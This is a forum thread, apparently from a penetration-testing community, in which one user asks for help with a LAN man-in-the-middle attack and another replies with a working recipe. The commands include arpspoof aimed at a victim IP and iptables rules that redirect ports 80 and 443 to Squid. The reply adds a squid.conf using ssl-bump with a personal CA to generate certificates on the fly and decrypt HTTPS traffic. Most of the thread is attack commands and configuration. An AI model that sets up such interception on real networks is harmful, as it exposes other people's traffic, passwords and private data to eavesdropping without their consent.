new MITM :redirecting all the LAN traffic thought proxy ?!

[br0k3ngl@55]

hi everyone ,
I have trying to do MITM attack on LAN with help of squid proxy server, but i seem to miss something and i don't knowwhere to start searching :
1st of all what do i do:
* i start with IPTABLES and redircting the traffic from port 80 to 3128 (i am adding 443 to redirect https as well to the same port)

HTML Code:

 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 3128

and the other one

HTML Code:

  iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 3128

* then i am configuring squid to accept the traffic and redirect it back to internet. http://wiki.squid-cache.org/ConfigEx.../Portal/Splash
* to make it all work i am using arpspoof to take traffic from specific client and redirect it from one client to gateway.

HTML Code:

arpspoof -i wlan0 -t 10.0.0.116 10.0.0.254

the is

What DOES Work -
* i can the the that arpspoof is redirecting the traffic,
* squid is doing the caching (- well at least the cache.log is getting bigger every moment).
* iptables is doing redirecting.
What DOES NOT Work :
* when attacked client is openning the browser - what ever address is entered - it is not going anywhere

Can anyone suggest me what am i missing or doing incorrectly ?
thanks in advance.

[br0k3ngl@55]

still searching for answer - if any one have suggestion, please notify me by mail : [email protected]

[dig1tal]

Have you tried running wireshark or fiddler on the client?

[Nick_the_Greek]

Hi there!

There are a lot of things that have to being done to successfully perform a "Squid in the Middle" attack. Squid it's a HUGE chapter.

First of all you can not redirect port 443 if squid3 has not being compiled with SSL bump and dynamic SSL generation. (you will find many informations into the Internet about how to do that). Squid 3.1.2 from Kali's repos don't offer that and as far as I know none do. You have to compile it by your self.

Code:

squid3 -v
Squid Cache: Version 3.1.20
configure options:  '--build=i486-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' '--datadir=/usr/share/squid3' '--sysconfdir=/etc/squid3' '--mandir=/usr/share/man' '--with-cppunit-basedir=/usr' '--enable-inline' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-underscores' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth=basic,digest,ntlm,negotiate' '--enable-basic-auth-helpers=LDAP,MSNT,NCSA,PAM,SASL,SMB,YP,DB,POP3,getpwnam,squid_radius_auth,multi-domain-NTLM' '--enable-ntlm-auth-helpers=smb_lm,' '--enable-digest-auth-helpers=ldap,password' '--enable-negotiate-auth-helpers=squid_kerb_auth' '--enable-external-acl-helpers=ip_user,ldap_group,session,unix_group,wbinfo_group' '--enable-arp-acl' '--enable-esi' '--enable-zph-qos' '--enable-wccpv2' '--disable-translation' '--with-logdir=/var/log/squid3' '--with-pidfile=/var/run/squid3.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-linux-netfilter' 'build_alias=i486-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wall' 'LDFLAGS=-fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security' --with-squid=/build/squid3-tMZN4r/squid3-3.1.20

Second the squid.conf file has to be in right form and the rules (ACLs) has to be in correct form. (Where is your squid.conf?)

ex:

Code:

acl localnet src 192.168.60.0/24  	# My LAN
acl safeports port 21 70 80 210 280 443 488 563 591 631 777 901 81 3127-3129 1025-65535
acl sslports port 443 563 81 2087 8081 10000
acl connect method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !safeports
http_access deny CONNECT !sslports
http_access allow localhost
http_access allow localnet
http_access deny all

always_direct allow all # Critical!
ssl_bump server-first all # Critical!

# Ports :3127 http proxy, 3128 http transparent, 3129 https transparent.
http_port 3127 # Critical!
http_port 3128 intercept # Critical!
https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/../.../certificates/personal-ca.pem key=/../../certificates/personal-ca.pem # Critical!

sslcrtd_program /usr/lib/squid3/ssl_crtd -s /var/lib/ssl_db -M 4MB
sslcrtd_children 10 startup=5 idle=2

# Place your DNS servers here
dns_nameservers DNS1 DNS2

hierarchy_stoplist cgi-bin ?

# Memory Cache Options 512 MB of RAM 
cache_mem 512 MB
maximum_object_size_in_memory 5MB

refresh_pattern ^ftp:		1440	20%	10080
refresh_pattern ^gopher:	1440	0%	1440
refresh_pattern -i (/cgi-bin/|\?) 0	0%	0
refresh_pattern .		0	20%	4320
coredump_dir /var/spool/squid3
access_log stdio:/var/log/squid3/access.log squid

As you can see I've already create a CA root certificate (personal-ca.pem) which is being used in squid3.

iptables in the previous squid.conf file should look something like this (I m not using ARPspoof):

Code:

# Enable IPv4 forward
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

iptables --table nat --append POSTROUTING --out-interface IFACE -j MASQUERADE
iptables --append FORWARD --in-interface LANFACE -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to INETIP

# Transparent Squid3 Http & Https (Squid3 listens to 3128 (http traffic transparent) and 3129 (https traffic transparent) 
# localhost can access Squid3 to 3127 normal http proxy traffic
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.60.129:3128
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.60.129:3129
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129

Where:
IFACE=your internet interace (eg eth0)
INETIP=IP from Internet interface
LANFACE=your lan interface that your trying to intercept eg eth1

I suggest you trying first of all to setup a transparent proxied LAN and then move forward to a more advanced subject as SSL intercepted LAN. Luckily there are a lot of info into the Intenet to accomplish that or any other task that you will decide to use. It's crucial to understand what are you doing before to try it. I'm trying to say that just following another's guy instructions about how to do that it's not enough. You HAVE to understand what you are doing.

If you have enough patience I will upload in a month a so, a script where a Squid in the middle attack in a wireless LAN is included.

Good luck!

PS Please don't ask for a "private" solution to your e-mail. It's a good thing to get solutions publicly. I'm sure that other people will face the exactly same problems as you are
PS2 access.log and cache.log are your friends.

[Nick_the_Greek]

Hi there!
Here it is an example on how to this. I just finish it:
SSL Interception with Squid3 (MITM)